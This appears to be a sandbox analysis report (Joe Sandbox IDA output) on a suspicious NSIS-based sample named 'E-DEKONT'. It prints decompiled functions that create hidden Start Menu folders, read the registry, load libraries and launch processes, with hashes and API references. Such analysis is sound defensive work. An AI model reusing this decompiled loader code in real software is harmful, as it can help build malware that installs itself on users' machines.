                                                                            				_t28 = __ebx;
                                                                            				 *(_t36 + 8) = E00402C37(0xfffffff0);
                                                                            				_t17 = E00405BFE(_t16);
                                                                            				_t32 = _t17;
                                                                            				if(_t17 != __ebx) {
                                                                            					do {
                                                                            						_t34 = E00405B80(_t32, 0x5c);
                                                                            						_t31 =  *_t34;
                                                                            						 *_t34 = _t28;
                                                                            						if(_t31 != _t28) {
                                                                            							L5:
                                                                            							_t25 = E00405832( *(_t36 + 8));
                                                                            						} else {
                                                                            							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
                                                                            							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040584F(_t42) == 0) {
                                                                            								goto L5;
                                                                            							} else {
                                                                            								_t25 = E004057B5( *(_t36 + 8)); // executed
                                                                            							}
                                                                            						}
                                                                            						if(_t25 != _t28) {
                                                                            							if(_t25 != 0xb7) {
                                                                            								L9:
                                                                            								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                            							} else {
                                                                            								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                            								if((_t26 & 0x00000010) == 0) {
                                                                            									goto L9;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						 *_t34 = _t31;
                                                                            						_t32 = _t34 + 2;
                                                                            					} while (_t31 != _t28);
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
                                                                            					_push(0xfffffff5);
                                                                            					E00401423();
                                                                            				} else {
                                                                            					E00401423(0xffffffe6);
                                                                            					E00406282(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra\\Sldede",  *(_t36 + 8));
                                                                            					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                            					if(_t23 == 0) {
                                                                            						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                            					}
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405C0C
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                              • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede,?,00000000,000000F0), ref: 0040164D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede, xrefs: 00401640
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede
                                                                            • API String ID: 1892508949-935500906
                                                                            • Opcode ID: 73225eed0d1f65cb901f8f6d18868916e3c95e296cac37f30907a214286dc7a5
                                                                            • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                                            • Opcode Fuzzy Hash: 73225eed0d1f65cb901f8f6d18868916e3c95e296cac37f30907a214286dc7a5
                                                                            • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 53%
                                                                            			E00405C5B(void* __eflags, intOrPtr _a4) {
                                                                            				int _t11;
                                                                            				signed char* _t12;
                                                                            				long _t16;
                                                                            				intOrPtr _t18;
                                                                            				intOrPtr* _t21;
                                                                            				signed int _t23;
                                                                            
                                                                            				E00406282(0x42fa50, _a4);
                                                                            				_t21 = E00405BFE(0x42fa50);
                                                                            				if(_t21 != 0) {
                                                                            					E00406516(_t21);
                                                                            					if(( *0x434efc & 0x00000080) == 0) {
                                                                            						L5:
                                                                            						_t23 = _t21 - 0x42fa50 >> 1;
                                                                            						while(1) {
                                                                            							_t11 = lstrlenW(0x42fa50);
                                                                            							_push(0x42fa50);
                                                                            							if(_t11 <= _t23) {
                                                                            								break;
                                                                            							}
                                                                            							_t12 = E004065C5();
                                                                            							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                            								E00405B9F(0x42fa50);
                                                                            								continue;
                                                                            							} else {
                                                                            								goto L1;
                                                                            							}
                                                                            						}
                                                                            						E00405B53();
                                                                            						_t16 = GetFileAttributesW(??); // executed
                                                                            						return 0 | _t16 != 0xffffffff;
                                                                            					}
                                                                            					_t18 =  *_t21;
                                                                            					if(_t18 == 0 || _t18 == 0x5c) {
                                                                            						goto L1;
                                                                            					} else {
                                                                            						goto L5;
                                                                            					}
                                                                            				}
                                                                            				L1:
                                                                            				return 0;
                                                                            			}










                                                                            APIs
                                                                              • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405C0C
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                              • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                            • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420,00000000), ref: 00405CB4
                                                                            • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,75F63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75F63420), ref: 00405CC4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                            • String ID: C:\
                                                                            • API String ID: 3248276644-3404278061
                                                                            • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                            • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                                            • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                            • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                            			E0040525A(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                            				long _t9;
                                                                            				int _t15;
                                                                            				long _t16;
                                                                            
                                                                            				_t15 = _a8;
                                                                            				if(_t15 != 0x102) {
                                                                            					if(_t15 != 0x200) {
                                                                            						_t16 = _a16;
                                                                            						L7:
                                                                            						if(_t15 == 0x419 &&  *0x42d234 != _t16) {
                                                                            							_push(_t16);
                                                                            							_push(6);
                                                                            							 *0x42d234 = _t16;
                                                                            							E00404C30();
                                                                            						}
                                                                            						L11:
                                                                            						_t9 = CallWindowProcW( *0x42d23c, _a4, _t15, _a12, _t16); // executed
                                                                            						return _t9;
                                                                            					}
                                                                            					if(IsWindowVisible(_a4) == 0) {
                                                                            						L10:
                                                                            						_t16 = _a16;
                                                                            						goto L11;
                                                                            					}
                                                                            					_t16 = E00404BB0(_a4, 1);
                                                                            					_t15 = 0x419;
                                                                            					goto L7;
                                                                            				}
                                                                            				if(_a12 != 0x20) {
                                                                            					goto L10;
                                                                            				}
                                                                            				E00404263(0x413);
                                                                            				return 0;
                                                                            			}







                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 00405289
                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                                              • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                            • String ID:
                                                                            • API String ID: 3748168415-3916222277
                                                                            • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                            • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                                            • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                            • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
                                                                            			E00406150(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                            				int _v8;
                                                                            				long _t21;
                                                                            				long _t24;
                                                                            				char* _t30;
                                                                            
                                                                            				asm("sbb eax, eax");
                                                                            				_v8 = 0x800;
                                                                            				_t21 = E004060EF(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                            				_t30 = _a16;
                                                                            				if(_t21 != 0) {
                                                                            					L4:
                                                                            					 *_t30 =  *_t30 & 0x00000000;
                                                                            				} else {
                                                                            					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                                            					_t21 = RegCloseKey(_a20);
                                                                            					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                            						goto L4;
                                                                            					}
                                                                            				}
                                                                            				return _t21;
                                                                            			}








                                                                            APIs
                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                                            • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID: Call
                                                                            • API String ID: 3356406503-1824292864
                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                            • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                            • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405867(WCHAR* _a4) {
                                                                            				struct _PROCESS_INFORMATION _v20;
                                                                            				int _t7;
                                                                            
                                                                            				0x430250->cb = 0x44;
                                                                            				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430250,  &_v20); // executed
                                                                            				if(_t7 != 0) {
                                                                            					CloseHandle(_v20.hThread);
                                                                            					return _v20.hProcess;
                                                                            				}
                                                                            				return _t7;
                                                                            			}






                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                            • CloseHandle.KERNEL32(?), ref: 0040589D
                                                                            Strings
                                                                            • Error launching installer, xrefs: 0040587A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                            • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                                            • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                            • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 60%
                                                                            			E0040202C(void* __ebx, void* __eflags) {
                                                                            				struct HINSTANCE__* _t23;
                                                                            				struct HINSTANCE__* _t31;
                                                                            				void* _t32;
                                                                            				void* _t34;
                                                                            				WCHAR* _t37;
                                                                            				intOrPtr* _t38;
                                                                            				void* _t39;
                                                                            
                                                                            				_t32 = __ebx;
                                                                            				asm("sbb eax, 0x434fb8");
                                                                            				 *(_t39 - 4) = 1;
                                                                            				if(__eflags < 0) {
                                                                            					_push(0xffffffe7);
                                                                            					L15:
                                                                            					E00401423();
                                                                            					L16:
                                                                            					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                            					return 0;
                                                                            				}
                                                                            				_t37 = E00402C37(0xfffffff0);
                                                                            				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37(1);
                                                                            				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
                                                                            					L3:
                                                                            					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
                                                                            					 *(_t39 + 8) = _t23;
                                                                            					if(_t23 == _t32) {
                                                                            						_push(0xfffffff6);
                                                                            						goto L15;
                                                                            					}
                                                                            					L4:
                                                                            					_t38 = E004066CB( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
                                                                            					if(_t38 == _t32) {
                                                                            						E004052E6(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
                                                                            					} else {
                                                                            						 *(_t39 - 4) = _t32;
                                                                            						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
                                                                            							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdd4, 0x40a000); // executed
                                                                            						} else {
                                                                            							E00401423( *((intOrPtr*)(_t39 - 0x20)));
                                                                            							if( *_t38() != 0) {
                                                                            								 *(_t39 - 4) = 1;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E00403930( *(_t39 + 8)) != 0) {
                                                                            						FreeLibrary( *(_t39 + 8));
                                                                            					}
                                                                            					goto L16;
                                                                            				}
                                                                            				_t31 = GetModuleHandleW(_t37); // executed
                                                                            				 *(_t39 + 8) = _t31;
                                                                            				if(_t31 != __ebx) {
                                                                            					goto L4;
                                                                            				}
                                                                            				goto L3;
                                                                            			}











                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                              • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                              • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
                                                                              • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                              • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 334405425-0
                                                                            • Opcode ID: a69309817c85ba968541a9951c146186ac4bb7107100abfe604f96daf0412f93
                                                                            • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                                            • Opcode Fuzzy Hash: a69309817c85ba968541a9951c146186ac4bb7107100abfe604f96daf0412f93
                                                                            • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                            			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
                                                                            				void* _t9;
                                                                            				int _t10;
                                                                            				long _t13;
                                                                            				int* _t16;
                                                                            				intOrPtr _t21;
                                                                            				void* _t22;
                                                                            				short* _t24;
                                                                            				void* _t26;
                                                                            				void* _t29;
                                                                            
                                                                            				_t24 = __esi;
                                                                            				_t21 = __edx;
                                                                            				_t16 = __ebx;
                                                                            				_t9 = E00402C77(_t29, 0x20019); // executed
                                                                            				_t22 = _t9;
                                                                            				_t10 = E00402C15(3);
                                                                            				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
                                                                            				 *__esi = __ebx;
                                                                            				if(_t22 == __ebx) {
                                                                            					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                            				} else {
                                                                            					 *(_t26 + 8) = 0x3ff;
                                                                            					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
                                                                            						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx); // executed
                                                                            						__eflags = _t13;
                                                                            						if(_t13 != 0) {
                                                                            							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                            						}
                                                                            					} else {
                                                                            						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
                                                                            					}
                                                                            					_t24[0x3ff] = _t16;
                                                                            					_push(_t22);
                                                                            					RegCloseKey();
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
                                                                            				return 0;
                                                                            			}













                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                            • RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 00402538
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,00000000,00000011,00000002), ref: 00402551
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseValue
                                                                            • String ID:
                                                                            • API String ID: 397863658-0
                                                                            • Opcode ID: c832eaacb46ec7e37e3c909b04b0f5a7b1d59f046349089feca9454346e38fdc
                                                                            • Instruction ID: 003629ead7c1dde4a3df59a88d33c100c9cba26094b7a58fe8a243c177e5491d
                                                                            • Opcode Fuzzy Hash: c832eaacb46ec7e37e3c909b04b0f5a7b1d59f046349089feca9454346e38fdc
                                                                            • Instruction Fuzzy Hash: 65018471904104EFE7159FA5DE89ABFB6BCEF44358F10403EF105A61D0DBB84E449B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 21%
                                                                            			E1000289C(void* __ecx, intOrPtr _a4) {
                                                                            				signed int _v8;
                                                                            				void* _t31;
                                                                            				void* _t32;
                                                                            				long _t36;
                                                                            				void* _t40;
                                                                            				void* _t49;
                                                                            				void* _t54;
                                                                            				void* _t58;
                                                                            				signed int _t65;
                                                                            				void* _t70;
                                                                            				void* _t79;
                                                                            				intOrPtr _t81;
                                                                            				signed int _t88;
                                                                            				intOrPtr _t90;
                                                                            				intOrPtr _t91;
                                                                            				void* _t92;
                                                                            				void* _t94;
                                                                            				void* _t100;
                                                                            				void* _t101;
                                                                            				void* _t102;
                                                                            				void* _t103;
                                                                            				intOrPtr _t106;
                                                                            				intOrPtr _t107;
                                                                            
                                                                            				if( *0x10004050 != 0 && E1000281E(_a4) == 0) {
                                                                            					 *0x10004054 = _t106;
                                                                            					if( *0x1000404c != 0) {
                                                                            						_t106 =  *0x1000404c;
                                                                            					} else {
                                                                            						E10002DE0(E10002818(), __ecx);
                                                                            						 *0x1000404c = _t106;
                                                                            					}
                                                                            				}
                                                                            				_t31 = E1000285A(_a4);
                                                                            				_t107 = _t106 + 4;
                                                                            				if(_t31 <= 0) {
                                                                            					L9:
                                                                            					_t32 = E1000284E();
                                                                            					_t81 = _a4;
                                                                            					_t90 =  *0x10004058;
                                                                            					 *((intOrPtr*)(_t32 + _t81)) = _t90;
                                                                            					 *0x10004058 = _t81;
                                                                            					E10002848();
                                                                            					_t36 = SetFilePointer(??, ??, ??, ??); // executed
                                                                            					 *0x10004034 = _t36;
                                                                            					 *0x10004038 = _t90;
                                                                            					if( *0x10004050 != 0 && E1000281E( *0x10004058) == 0) {
                                                                            						 *0x1000404c = _t107;
                                                                            						_t107 =  *0x10004054;
                                                                            					}
                                                                            					_t91 =  *0x10004058;
                                                                            					_a4 = _t91;
                                                                            					 *0x10004058 =  *((intOrPtr*)(E1000284E() + _t91));
                                                                            					_t40 = E1000282C(_t91);
                                                                            					_pop(_t92);
                                                                            					if(_t40 != 0) {
                                                                            						_t49 = E1000285A(_t92);
                                                                            						if(_t49 > 0) {
                                                                            							_push(_t49);
                                                                            							_push(E10002865() + _a4 + _v8);
                                                                            							_push(E1000286F());
                                                                            							if( *0x10004050 <= 0 || E1000281E(_a4) != 0) {
                                                                            								_pop(_t101);
                                                                            								_pop(_t54);
                                                                            								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
                                                                            								}
                                                                            								asm("loop 0xfffffff5");
                                                                            							} else {
                                                                            								_pop(_t102);
                                                                            								_pop(_t58);
                                                                            								 *0x1000404c =  *0x1000404c +  *(_t102 + _t58) * 4;
                                                                            								asm("loop 0xffffffeb");
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					if( *0x10004058 == 0) {
                                                                            						 *0x1000404c = 0;
                                                                            					}
                                                                            					_t94 = _a4 + E10002865();
                                                                            					 *(E10002873() + _t94) =  *0x10004034;
                                                                            					 *((intOrPtr*)(E10002877() + _t94)) =  *0x10004038;
                                                                            					E10002887(_a4);
                                                                            					if(E1000283A() != 0) {
                                                                            						 *0x10004068 = GetLastError();
                                                                            					}
                                                                            					return _a4;
                                                                            				}
                                                                            				_push(E10002865() + _a4);
                                                                            				_t65 = E1000286B();
                                                                            				_v8 = _t65;
                                                                            				_t88 = _t31;
                                                                            				_push(_t77 + _t65 * _t88);
                                                                            				_t79 = E10002877();
                                                                            				_t100 = E10002873();
                                                                            				_t103 = E1000286F();
                                                                            				_t70 = _t88;
                                                                            				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
                                                                            					_push( *((intOrPtr*)(_t79 + _t70)));
                                                                            				}
                                                                            				_push( *((intOrPtr*)(_t100 + _t70)));
                                                                            				asm("loop 0xfffffff1");
                                                                            				goto L9;
                                                                            			}



























                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000), ref: 1000295B
                                                                            • GetLastError.KERNEL32 ref: 10002A62
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                            • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                            • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                            • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                            			E0040247E(int* __ebx, char* __esi) {
                                                                            				void* _t17;
                                                                            				short* _t18;
                                                                            				void* _t33;
                                                                            				void* _t37;
                                                                            				void* _t40;
                                                                            
                                                                            				_t35 = __esi;
                                                                            				_t27 = __ebx;
                                                                            				_t17 = E00402C77(_t40, 0x20019); // executed
                                                                            				_t33 = _t17;
                                                                            				_t18 = E00402C37(0x33);
                                                                            				 *__esi = __ebx;
                                                                            				if(_t33 == __ebx) {
                                                                            					 *(_t37 - 4) = 1;
                                                                            				} else {
                                                                            					 *(_t37 - 0x4c) = 0x800;
                                                                            					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
                                                                            						L7:
                                                                            						 *_t35 = _t27;
                                                                            						 *(_t37 - 4) = 1;
                                                                            					} else {
                                                                            						if( *(_t37 + 8) == 4) {
                                                                            							__eflags =  *(_t37 - 0x18) - __ebx;
                                                                            							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                                                            							E004061C9(__esi,  *__esi);
                                                                            						} else {
                                                                            							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                            								 *(_t37 - 4) =  *(_t37 - 0x18);
                                                                            								_t35[0x7fe] = _t27;
                                                                            							} else {
                                                                            								goto L7;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					_push(_t33);
                                                                            					RegCloseKey();
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
                                                                            				return 0;
                                                                            			}









                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsx82F6.tmp,00000000,00000011,00000002), ref: 00402551
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
